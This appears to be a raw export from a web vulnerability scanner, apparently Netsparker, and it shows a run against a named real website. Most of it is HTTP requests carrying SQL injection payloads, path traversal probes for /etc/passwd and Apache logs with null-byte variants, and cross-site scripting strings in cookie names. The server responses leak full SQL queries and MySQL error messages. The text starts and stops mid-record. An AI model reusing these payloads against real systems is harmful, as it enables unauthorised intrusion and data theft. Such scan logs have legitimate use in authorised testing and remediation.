OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iar9h3u8k91u168q9242du67l4; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pbbvsla13h2ld0e3sr9aj1u6d5; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/obtm00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
